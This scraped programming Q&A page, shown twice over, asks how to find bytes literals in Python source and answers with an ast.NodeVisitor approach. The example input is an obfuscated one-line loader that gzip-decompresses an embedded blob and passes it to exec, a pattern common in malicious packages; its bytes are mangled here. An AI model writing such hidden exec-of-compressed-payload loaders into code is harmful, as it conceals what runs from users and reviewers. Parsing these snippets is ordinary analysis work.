Find all occurrences of bytestrings in a python code snippet
Question:
I’m trying to parse python snippets, some of which contains bytestrings.
for example:
"""
from gzip import decompress as __;_=exec;_(__(b'x1fx8bx08x00xcbYmcx02xffxbd7ixb3xdaJvxdfxdfxaf /Ixf9xbarxc6%x81@x92kx9c)x16I,bx95Xmx87x92Z-$xd0x86x16x10LM~{Nx03xd7xc6xd7x9e%xa9xa9PE/xa7xcfxbeukxd3xacmxdd"x94x1b'xa5xdax04"Hx17xaexe3txf4xcdnx03xa9/&T>x13xdbug=x9fx13~x11xf6x9bxd7x15~xb2xe7xbcxe6xc2Kxb8x18x03xfd|[x7fxe8xb8I;xf0xf1x93xecx83x8eo15x8dCxfcxc6Ixf1xfdxf5rx8fxebx0fxd7xc53#xa8<_xb2Pyxbexe1xdexffx0fk&x93xa8Vx18x00x00'))
x = b"x1fx8bx08"
y = "hello world"
"""
Is there a regex pattern I can use to correctly find those strings?
I have tried implementing a regex query myself, like so:
bytestrings= re.findall(r'b"(.+?)"', text) + re.findall(r"b'(.+?)'", text)
I was expecting to receive an array
[b'x1fx8bx08x00xcbYmcx02xffxbd7ixb3xdaJvxdfxdfxaf /Ixf9xbarxc6%x81@x92kx9c)x16I,bx95Xmx87x92Z-$xd0x86x16x10LM~{Nx03xd7xc6xd7x9e%xa9xa9PE/xa7xcfxbeukxd3xacmxdd"x94x1b'xa5xdax04"Hx17xaexe3txf4xcdnx03xa9/&T>x13xdbug=x9fx13~x11xf6x9bxd7x15~xb2xe7xbcxe6xc2Kxb8x18x03xfd|[x7fxe8xb8I;xf0xf1x93xecx83x8eo15x8dCxfcxc6Ixf1xfdxf5rx8fxebx0fxd7xc53#xa8<_xb2Pyxbexe1xdexffx0fk&x93xa8Vx18x00x00', b"x1fx8bx08"]
instead it returns an empty array.
Answers:
This isn’t a job for regular expressions, but for a Python parser.
import ast
code = """
...
"""
tree = ast.parse(code)
Now you can walk the tree looking for values of type ast.Constant
whose value
attributes have type bytes
. Do this by defining a subclass of ast.NodeVisitor
and overriding its visit_Constant
method. This method will be called on each node of type ast.Constant
in the tree, letting you examine the value. Here, we simply add appropriate values to a global list.
bytes_literals = []
class BytesLiteralCollector(ast.NodeVisitor):
def visit_Constant(self, node):
if isinstance(node.value, bytes):
bytes_literals.append(node.value)
BytesLiteralCollector().visit(tree)
The documentation for NodeVisitor
is not great. Aside from the two documented methods visit
and generic_visit
, I believe you can define visit_*
where *
can be any of the node types defined in the abstract grammar presented at the start of the documentation.
You can use print(ast.dump(ast.parse(code), indent=4))
to get a more-or-less readable representation of the tree that your visitor will walk.
I’m trying to parse python snippets, some of which contains bytestrings.
for example:
"""
from gzip import decompress as __;_=exec;_(__(b'x1fx8bx08x00xcbYmcx02xffxbd7ixb3xdaJvxdfxdfxaf /Ixf9xbarxc6%x81@x92kx9c)x16I,bx95Xmx87x92Z-$xd0x86x16x10LM~{Nx03xd7xc6xd7x9e%xa9xa9PE/xa7xcfxbeukxd3xacmxdd"x94x1b'xa5xdax04"Hx17xaexe3txf4xcdnx03xa9/&T>x13xdbug=x9fx13~x11xf6x9bxd7x15~xb2xe7xbcxe6xc2Kxb8x18x03xfd|[x7fxe8xb8I;xf0xf1x93xecx83x8eo15x8dCxfcxc6Ixf1xfdxf5rx8fxebx0fxd7xc53#xa8<_xb2Pyxbexe1xdexffx0fk&x93xa8Vx18x00x00'))
x = b"x1fx8bx08"
y = "hello world"
"""
Is there a regex pattern I can use to correctly find those strings?
I have tried implementing a regex query myself, like so:
bytestrings= re.findall(r'b"(.+?)"', text) + re.findall(r"b'(.+?)'", text)
I was expecting to receive an array
[b'x1fx8bx08x00xcbYmcx02xffxbd7ixb3xdaJvxdfxdfxaf /Ixf9xbarxc6%x81@x92kx9c)x16I,bx95Xmx87x92Z-$xd0x86x16x10LM~{Nx03xd7xc6xd7x9e%xa9xa9PE/xa7xcfxbeukxd3xacmxdd"x94x1b'xa5xdax04"Hx17xaexe3txf4xcdnx03xa9/&T>x13xdbug=x9fx13~x11xf6x9bxd7x15~xb2xe7xbcxe6xc2Kxb8x18x03xfd|[x7fxe8xb8I;xf0xf1x93xecx83x8eo15x8dCxfcxc6Ixf1xfdxf5rx8fxebx0fxd7xc53#xa8<_xb2Pyxbexe1xdexffx0fk&x93xa8Vx18x00x00', b"x1fx8bx08"]
instead it returns an empty array.
This isn’t a job for regular expressions, but for a Python parser.
import ast
code = """
...
"""
tree = ast.parse(code)
Now you can walk the tree looking for values of type ast.Constant
whose value
attributes have type bytes
. Do this by defining a subclass of ast.NodeVisitor
and overriding its visit_Constant
method. This method will be called on each node of type ast.Constant
in the tree, letting you examine the value. Here, we simply add appropriate values to a global list.
bytes_literals = []
class BytesLiteralCollector(ast.NodeVisitor):
def visit_Constant(self, node):
if isinstance(node.value, bytes):
bytes_literals.append(node.value)
BytesLiteralCollector().visit(tree)
The documentation for NodeVisitor
is not great. Aside from the two documented methods visit
and generic_visit
, I believe you can define visit_*
where *
can be any of the node types defined in the abstract grammar presented at the start of the documentation.
You can use print(ast.dump(ast.parse(code), indent=4))
to get a more-or-less readable representation of the tree that your visitor will walk.